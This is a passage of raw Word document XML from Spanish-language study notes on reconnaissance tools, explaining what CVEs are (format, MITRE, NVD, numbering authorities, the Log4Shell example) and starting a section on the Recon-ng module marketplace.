          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1211DB0C" w14:textId="77777777" w:rsidR="00562794" w:rsidRPr="00562794" w:rsidRDefault="00562794" w:rsidP="00562794">
            <w:r w:rsidRPr="00562794">
              <w:t xml:space="preserve">Los </w:t>
            </w:r>
            <w:r w:rsidRPr="00562794">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CVE (Common Vulnerabilities and Exposures)</w:t>
            </w:r>
            <w:r w:rsidRPr="00562794">
              <w:t xml:space="preserve"> son identificadores únicos para vulnerabilidades de seguridad conocidas públicamente.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="520D0757" w14:textId="77777777" w:rsidR="00562794" w:rsidRPr="00562794" w:rsidRDefault="00562794" w:rsidP="00562794">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00562794">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Formato:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58DF8658" w14:textId="77777777" w:rsidR="00562794" w:rsidRPr="00562794" w:rsidRDefault="00562794" w:rsidP="00562794">
            <w:r w:rsidRPr="00562794">
              <w:t>CVE-[AÑO]-[NÚMERO]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1231D3D6" w14:textId="77777777" w:rsidR="00562794" w:rsidRPr="00562794" w:rsidRDefault="00562794" w:rsidP="00562794">
            <w:r w:rsidRPr="00562794">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Ejemplo:</w:t>
            </w:r>
            <w:r w:rsidRPr="00562794">
              <w:t xml:space="preserve"> CVE-2021-44228 (Log4Shell)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C986181" w14:textId="77777777" w:rsidR="00562794" w:rsidRPr="00562794" w:rsidRDefault="00562794" w:rsidP="00562794">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00562794">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Para qué sirven:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CE16483" w14:textId="77777777" w:rsidR="00562794" w:rsidRPr="00562794" w:rsidRDefault="00562794">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00562794">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Estandarizar</w:t>
            </w:r>
            <w:r w:rsidRPr="00562794">
              <w:t xml:space="preserve"> la identificación de vulnerabilidades</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DD9B67B" w14:textId="77777777" w:rsidR="00562794" w:rsidRPr="00562794" w:rsidRDefault="00562794">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00562794">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Facilitar</w:t>
            </w:r>
            <w:r w:rsidRPr="00562794">
              <w:t xml:space="preserve"> el seguimiento y gestión de parches</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="743A4BB2" w14:textId="77777777" w:rsidR="00562794" w:rsidRPr="00562794" w:rsidRDefault="00562794">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00562794">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Compartir</w:t>
            </w:r>
            <w:r w:rsidRPr="00562794">
              <w:t xml:space="preserve"> información entre organizaciones de seguridad</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B76E2A6" w14:textId="77777777" w:rsidR="00562794" w:rsidRPr="00562794" w:rsidRDefault="00562794" w:rsidP="00562794">
            <w:r w:rsidRPr="00562794">
              <w:t xml:space="preserve">En tu imagen de Maltego, estás viendo CVEs asociados a </w:t>
            </w:r>
            <w:r w:rsidRPr="00562794">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>INACAP</w:t>
            </w:r>
            <w:r w:rsidRPr="00562794">
              <w:t>, lo que significa que se están mostrando vulnerabilidades de seguridad relacionadas con sus sistemas o infraestructura durante diferentes años (2017-2021).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C4653DA" w14:textId="77777777" w:rsidR="00562794" w:rsidRDefault="00562794" w:rsidP="00C35F29"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14228346" w14:textId="77777777" w:rsidR="00562794" w:rsidRDefault="00562794" w:rsidP="00C35F29"/>
    <w:p w14:paraId="0FB3F349" w14:textId="77777777" w:rsidR="000344DA" w:rsidRDefault="000344DA" w:rsidP="00C35F29"/>
    <w:p w14:paraId="74580004" w14:textId="77777777" w:rsidR="000344DA" w:rsidRDefault="000344DA" w:rsidP="00C35F29"/>
    <w:p w14:paraId="44187CE3" w14:textId="77777777" w:rsidR="000344DA" w:rsidRDefault="000344DA" w:rsidP="00C35F29"/>
    <w:p w14:paraId="656407B2" w14:textId="735201BC" w:rsidR="000344DA" w:rsidRDefault="000344DA" w:rsidP="000344DA">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000344DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.9.4 Que son los CVEs? (IMPORT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3DAE" w14:paraId="7B62398D" w14:textId="77777777" w:rsidTr="006D3DAE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C73CD2F" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE" w:rsidP="006D3DAE">
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve">¡Excelente pregunta! Sí, los </w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CVE son completamente internacionales</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11935839" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE" w:rsidP="006D3DAE">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>¿Qué es el sistema CVE?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CAC3582" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE" w:rsidP="006D3DAE">
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CVE</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve"> es administrado por </w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>MITRE Corporation</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve"> (organización sin fines de lucro de EE.UU.) financiada por el gobierno estadounidense, pero es un </w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>estándar global</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="558D9BE9" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE" w:rsidP="006D3DAE">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Características del Sistema CVE:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34A311C3" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE" w:rsidP="006D3DAE">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Universal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EED30B1" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve">Se usa en </w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>todos los países</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve"> del mundo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C71E1C0" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:t>Mismo CVE identifica la misma vulnerabilidad globalmente</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57EE4882" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:t>No importa dónde estés: Chile, España, Japón, etc.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B60812F" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE" w:rsidP="006D3DAE">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>🌍</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Base de Datos Global</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7048DFBB" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE" w:rsidP="006D3DAE">
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve">La </w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>National Vulnerability Database (NVD)</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve"> del NIST mantiene información detallada de todos los CVE a nivel mundial.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36BC0C49" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE" w:rsidP="006D3DAE">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>📊</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Ejemplo:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67301007" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE" w:rsidP="006D3DAE">
            <w:r w:rsidRPr="006D3DAE">
              <w:t>CVE-2021-44228 (Log4Shell)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39E3CFA2" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE" w:rsidP="006D3DAE">
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve">Este CVE se refiere a la </w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>misma vulnerabilidad</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve"> en:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73A153B0" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🇨🇱</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve"> Chile</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F147EFA" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🇺🇸</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve"> Estados Unidos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2057F000" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🇯🇵</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve"> Japón</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="689EE5CC" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🇩🇪</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve"> Alemania</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32E2ACFC" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🌍</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve"> Cualquier país</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D130C46" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE" w:rsidP="006D3DAE">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>¿Quién puede reportar CVE?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ECAB345" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE" w:rsidP="006D3DAE">
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve">Organizaciones autorizadas llamadas </w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CNA (CVE Numbering Authorities)</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve"> en diferentes países:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="614C2FBD" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Microsoft</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve"> (EE.UU.)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42D03F0D" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Google</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve"> (EE.UU.)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A0FA3F3" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Red Hat</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve"> (EE.UU.)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55116D07" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Kaspersky</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve"> (Rusia)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="189097E3" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Huawei</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve"> (China)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E1F99FB" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve">Y más de </w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>100 organizaciones</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve"> mundialmente</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D632D12" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE" w:rsidP="006D3DAE">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Consultar CVE:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00C4BAD3" w14:textId="77777777" w:rsidR="006D3DAE" w:rsidRPr="006D3DAE" w:rsidRDefault="006D3DAE" w:rsidP="006D3DAE">
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🔗</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://cve.mitre.org</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>🔗</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>https://nvd.nist.gov</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="698A5816" w14:textId="5C17D464" w:rsidR="006D3DAE" w:rsidRDefault="006D3DAE" w:rsidP="000344DA">
            <w:r w:rsidRPr="006D3DAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Respuesta corta:</w:t>
            </w:r>
            <w:r w:rsidRPr="006D3DAE">
              <w:t xml:space="preserve"> Sí, los CVE son un estándar internacional usado por todo el mundo para identificar las mismas vulnerabilidades de seguridad.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6BF33747" w14:textId="77777777" w:rsidR="000344DA" w:rsidRPr="000344DA" w:rsidRDefault="000344DA" w:rsidP="000344DA"/>
    <w:p w14:paraId="7CA51D5A" w14:textId="77777777" w:rsidR="000344DA" w:rsidRDefault="000344DA" w:rsidP="00C35F29"/>
    <w:p w14:paraId="53FA6C06" w14:textId="77777777" w:rsidR="00B01054" w:rsidRDefault="00B01054" w:rsidP="00C35F29"/>
    <w:p w14:paraId="613742D8" w14:textId="77777777" w:rsidR="00B01054" w:rsidRDefault="00B01054" w:rsidP="00C35F29"/>
    <w:p w14:paraId="13E39978" w14:textId="77777777" w:rsidR="00B01054" w:rsidRDefault="00B01054" w:rsidP="00C35F29"/>
    <w:p w14:paraId="53FEC85C" w14:textId="77777777" w:rsidR="00B01054" w:rsidRDefault="00B01054" w:rsidP="00C35F29"/>
    <w:p w14:paraId="2E0D8AFA" w14:textId="77777777" w:rsidR="00B01054" w:rsidRDefault="00B01054" w:rsidP="00C35F29"/>
    <w:p w14:paraId="0FEDA4CC" w14:textId="77777777" w:rsidR="00B01054" w:rsidRDefault="00B01054" w:rsidP="00C35F29"/>
    <w:p w14:paraId="35F6DED6" w14:textId="77777777" w:rsidR="00B01054" w:rsidRDefault="00B01054" w:rsidP="00C35F29"/>
    <w:p w14:paraId="68614F2D" w14:textId="77777777" w:rsidR="00B01054" w:rsidRDefault="00B01054" w:rsidP="00C35F29"/>
    <w:p w14:paraId="1C1F4131" w14:textId="77777777" w:rsidR="00B01054" w:rsidRDefault="00B01054" w:rsidP="00C35F29"/>
    <w:p w14:paraId="11E47954" w14:textId="77777777" w:rsidR="00B01054" w:rsidRDefault="00B01054" w:rsidP="00C35F29"/>
    <w:p w14:paraId="5BEE0140" w14:textId="2F82383D" w:rsidR="00B01054" w:rsidRDefault="00B01054" w:rsidP="00B01054">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01054">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.9 Recon-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3820C338" w14:textId="16CB0F70" w:rsidR="00B01054" w:rsidRDefault="003E37E0" w:rsidP="00C35F29">
      <w:r w:rsidRPr="003E37E0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="071C020D" wp14:editId="5A2B98B4">
            <wp:extent cx="6858000" cy="4509770"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="3085328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32869" name="Imagen 1" descr="Captura de pantalla de computadora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4B76" w14:textId="0763E951" w:rsidR="009D0190" w:rsidRDefault="009D0190" w:rsidP="00C35F29">
      <w:r w:rsidRPr="009D0190">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EFA8F89" wp14:editId="21375A25">
            <wp:extent cx="6858000" cy="2757805"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="214906303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6303" name="Imagen 1" descr="Pantalla de computadora con letras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17F0" w14:textId="1B9D393F" w:rsidR="009D0190" w:rsidRDefault="009D0190" w:rsidP="00C35F29">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SIEMPRE USAR el comando: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0190">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>arketplace search</w:t>
      </w:r>
      <w:r w:rsidR="005054D7">
        <w:br/>
      </w:r>
      <w:r w:rsidR="005054D7">
        <w:br/>
      </w:r>
      <w:r w:rsidR="005054D7" w:rsidRPr="005054D7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79A9EA25" wp14:editId="56BFA3AA">
            <wp:extent cx="6858000" cy="3849370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12278085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8518" name="Imagen 1" descr="Captura de pantalla de computadora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629" w14:textId="3159E8CC" w:rsidR="005054D7" w:rsidRDefault="005054D7" w:rsidP="00C35F29">
      <w:r w:rsidRPr="005054D7">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Para encontrar uno especifico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2C1754" w14:textId="244734FA" w:rsidR="005054D7" w:rsidRDefault="008537BE" w:rsidP="00C35F29">
      <w:r w:rsidRPr="008537BE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
